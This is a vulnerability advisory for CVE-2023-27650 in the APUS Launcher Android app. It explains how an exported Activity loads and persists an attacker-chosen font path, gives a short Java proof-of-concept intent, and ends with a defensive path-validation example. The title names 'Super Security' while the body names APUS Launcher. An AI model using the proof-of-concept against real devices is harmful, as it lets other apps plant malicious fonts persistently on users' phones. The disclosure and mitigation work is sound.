
Code execution exists in Super Security (CVE-2023-27650)

Vendor: APUS Group (https://www.apusapps.com/en/launcher)

Affected product: APUS Launcher (com.apusapps.launcher)

Version: 3.10.88, 3.10.73

Download link: https://play.google.com/store/apps/details?id=com.apusapps.launcher

Description of the vulnerability for use in the CVE: An issue found in APUS Group Launcher v.3.10.73 and v.3.10.88 allows a remote attacker to execute arbitrary code via the FONT_FILE parameter.

Additional information: APUS Launcher allows unauthorized applications to launch one of its Activities and, through extra data carried in the intent, control which font file is loaded on the app desktop. Specifically, APUS Launcher exposes an Activity that reads a font file path from the incoming intent and loads the app desktop icon font from that path, so an attacker who specifies the path can make APUS Launcher load a malicious font file. The attack is persistent, because APUS Launcher stores the path in its SharedPreferences file.

APUS Launcher's HiFontCooperationActivity reads the "com.apus.launcher.extra.FONT_FILE" extra from the incoming intent and uses its value as the path of the app desktop icon font file. Because HiFontCooperationActivity is exposed, an attacker can send an intent carrying a malicious file path and cause APUS Launcher to load a malicious font, resulting in display exceptions or security vulnerabilities (such as data leakage, application crashes, denial of service attacks, etc.).

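PoC:

// Runs inside an Activity of the calling app; needs android.content.Intent and android.content.ComponentName.
private void attack() {
    Intent intent = new Intent();
    // Explicitly target the exposed Activity in APUS Launcher.
    ComponentName componentName = new ComponentName("com.apusapps.launcher", "com.apusapps.launcher.launcher.HiFontCooperationActivity");
    intent.setComponent(componentName);
    // The font file path that HiFontCooperationActivity reads from this extra.
    intent.putExtra("com.apus.launcher.extra.FONT_FILE", "/data/local/tmp/方正胖头鱼.TTF");
    try {
        System.out.println("start activity");
        startActivity(intent);
    } catch (Exception e) {
        e.printStackTrace();
    }
}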
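
One way a receiving component could check the FONT_FILE value before loading or persisting it, shown as an added example (not code from APUS Launcher or from this advisory, and not the vendor's fix). The class name FontPathValidator, the allowed-directory policy, the accepted extensions and the size cap are all assumptions; the sample files are constructed in a temporary directory.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Locale;

/** Hypothetical helper: vets an untrusted font path taken from an intent extra. */
public final class FontPathValidator {
    private static final long MAX_FONT_BYTES = 20L * 1024 * 1024; // assumed size cap

    private final Path allowedDir;

    /** allowedDir: a directory only the app can write, e.g. a fonts folder in its private storage. */
    public FontPathValidator(File allowedDir) throws IOException {
        this.allowedDir = allowedDir.getCanonicalFile().toPath();
    }

    /** Returns the canonical font file if acceptable, or null if it must be rejected. */
    public File validate(String untrustedPath) {
        if (untrustedPath == null || untrustedPath.isEmpty()) return null;
        try {
            // Canonicalize first so "../" segments and symlinks cannot escape allowedDir.
            File canonical = new File(untrustedPath).getCanonicalFile();
            if (!canonical.toPath().startsWith(allowedDir)) return null;
            String name = canonical.getName().toLowerCase(Locale.ROOT);
            if (!name.endsWith(".ttf") && !name.endsWith(".otf")) return null;
            if (!canonical.isFile() || canonical.length() > MAX_FONT_BYTES) return null;
            return canonical;
        } catch (IOException e) {
            return null; // unresolvable path: treat as rejected
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample layout: one font inside the allowed directory, one outside it.
        Path base = Files.createTempDirectory("fontdemo");
        Path fonts = Files.createDirectory(base.resolve("fonts"));
        Path good = Files.write(fonts.resolve("theme.ttf"), new byte[] {0, 1, 0, 0});
        Path outside = Files.write(base.resolve("other.ttf"), new byte[] {0, 1, 0, 0});

        FontPathValidator v = new FontPathValidator(fonts.toFile());
        System.out.println("inside allowed dir accepted: " + (v.validate(good.toString()) != null));
        System.out.println("outside allowed dir accepted: " + (v.validate(outside.toString()) != null));
        System.out.println("traversal accepted: " + (v.validate(fonts + "/../other.ttf") != null));
        System.out.println("shared tmp path accepted: " + (v.validate("/data/local/tmp/example.ttf") != null));
    }
}
```

Only a path that passes this check should be written to SharedPreferences, since the advisory notes that the stored path is what makes the issue persistent.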